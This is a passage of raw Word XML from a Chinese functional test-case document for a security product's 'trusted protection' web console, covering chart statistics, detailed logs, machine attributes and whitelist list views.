              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> 在“可信防护”页面点击“图表统计”，下拉框中选择选项，并点击搜索按钮跳转至结果页面。目前只有skyNet有数据支持。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="2238DB49" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="3775"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02EDCDF5"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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7802F0AA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="1f4"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>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1</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>在“图表统计”界面即可以看到被测试信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23D7A099"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FC186C8" wp14:editId="4E5C867E">
                  <wp:extent cx="4140200" cy="2494280"/>
                  <wp:effectExtent l="0" t="0" r="0" b="2032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22" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4140200" cy="2494280"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="2DCF5FF0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A4140DB"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测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3461FA62" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07A047F8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="002A0233">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="270" w:name="_Toc36487920"/>
      <w:bookmarkStart w:id="271" w:name="_Toc36630315"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可信防护-详细日志界面列表显示</w:t>
      </w:r>
      <w:bookmarkEnd w:id="270"/>
      <w:bookmarkEnd w:id="271"/>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691"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="40BAE717" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AF5970A"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lastRenderedPageBreak/>
              <w:t>测试用例标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AB018FA"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可信防护-详细日志显示功能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="02571411" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D40470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测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05F0CF8D"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PC电脑、</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome </w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>浏览器</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3C9D028E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61A97A5C"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预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DC7FF6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PC可以访问被测试的系统web端地址链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3EF6866D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E77E503"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测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0899A5B8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 点击界面中“列表显示”，跳转至可信审计页面下的列表显示页面。目前只有skyNet有数据支持。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0977409D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6F330DEC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="3775"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="128FD0B4"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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32463959" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="1f4"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>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1</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>在“详细日志”界面即可以看到被测试信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B12C866"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4EA06677" wp14:editId="7A87C323">
                  <wp:extent cx="4114800" cy="2480310"/>
                  <wp:effectExtent l="0" t="0" r="0" b="889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23" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2480310"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A9ECC52" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>下拉框中选择选项，并点击搜索按钮，所要的与此搜索信息相关的数据显示在下面。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29112268"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455602BC" wp14:editId="0FB3CB3B">
                  <wp:extent cx="4140200" cy="2475230"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1397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24" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4140200" cy="2475230"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1161C79A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="61B7EB48" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14AA12AB"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测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B9AEE61" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67CA2682" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="1f4"/>
        <w:ind w:left="1080" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51344502" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="002A0233">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="272" w:name="_Toc36487921"/>
      <w:bookmarkStart w:id="273" w:name="_Toc36630316"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>可信防护-机器属性列表显示测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="272"/>
      <w:bookmarkEnd w:id="273"/>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691"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="30A41EC9" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D483A43"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测试用例标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36F002B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可信防护-机器属性列表功能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="05F54AE1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="233DE0BC"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测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17E34C5D"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PC电脑、</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome </w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>浏览器</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="54D15F56" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E464AF8"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预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59B6CC88"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PC可以访问被测试的系统web端地址链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4B8BFDCE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F434F96"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测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54513C88" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 点击界面中“机器属性”，跳转至可信防护页面下的机器属性页面。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0AE492B7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="3775"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54949DDA"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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6478A21D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="1f4"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>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1</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>在“机器属性”界面即可以看到被测试信息</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02F01E49"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7F883D3E" wp14:editId="28A2772D">
                  <wp:extent cx="4143375" cy="2491105"/>
                  <wp:effectExtent l="0" t="0" r="22225" b="2349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25" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4143375" cy="2491105"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="50C691A3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 下拉框中选择关键词类别，并在搜索框中输入搜索关键词，点击搜索得到搜索结果</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>至结果</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>页面，例：在“文件路径”下搜索含“bin/init”字符串的数据项。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CCE001E"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7BC2B25D" wp14:editId="7741A2C0">
                  <wp:extent cx="4162425" cy="2513330"/>
                  <wp:effectExtent l="0" t="0" r="3175" b="127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26" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4162425" cy="2513330"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="35E770F1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="489028AA" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DDD1CB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测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26A2A491" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D74E15D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="1f4"/>
        <w:ind w:left="1080" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67F6A44B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="002A0233">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="274" w:name="_Toc36487922"/>
      <w:bookmarkStart w:id="275" w:name="_Toc36630317"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>可信防护-可信白名单界面列表测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="274"/>
      <w:bookmarkEnd w:id="275"/>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691"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="0716ED19" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C09C695"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测试用例标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E142D34"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可信防护-可信白名单列表功能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
